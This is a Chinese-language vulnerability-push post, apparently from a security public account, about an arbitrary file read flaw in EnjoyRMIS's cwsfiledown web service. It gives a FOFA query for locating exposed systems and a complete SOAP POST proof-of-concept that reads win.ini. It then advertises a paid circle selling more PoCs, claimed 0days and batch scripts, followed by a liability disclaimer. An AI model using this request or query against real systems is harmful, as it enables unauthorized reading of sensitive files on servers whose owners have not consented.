漏洞推送|EnjoyRMIS_cwsfiledown存在文件读取漏洞
漏洞推送|EnjoyRMIS_cwsfiledown存在文件读取漏洞
小白菜安全 小白菜安全 2024-12-02 13:03
漏洞描述
EnjoyRMIS cwsfiledown存在任意文件读取漏洞,攻击者可通过该漏洞获取敏感信息
资产信息
fofa:body=”CheckSilverlightInstalled”
漏洞复现
POC
POST /EnjoyRMIS_WS/WS/FileDown/cwsfiledown.asmx HTTP/1.1
Host:
Content-Type: text/xml; charset=utf-8
Content-Length: 623
SOAPAction: "http://tempuri.org/DownFileBytes"
<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<DownFileBytes xmlns="http://tempuri.org/">
<sFileName>c://windows//win.ini</sFileName>
<iPosition>2</iPosition>
<iReadBytesLen>101</iReadBytesLen>
<bReadBytes>ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg</bReadBytes>
</DownFileBytes>
</soap:Body>
</soap:Envelope>
更多漏洞poc(0day漏洞)、安全工具、批量脚本加入内部圈子获取,目前只要49,无理由3天退款,加入圈子请扫描下方二维码。
漏洞文库:
工具收集:
脚本文库:
免责声明
该公众号主要是分享互联网上公开的一些漏洞poc和工具,
利用本公众号所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,本公众号及作者不为此承担任何责任,一旦造成后果请自行承担!如果本公众号分享导致的侵权行为请告知,我们会立即删除并道歉。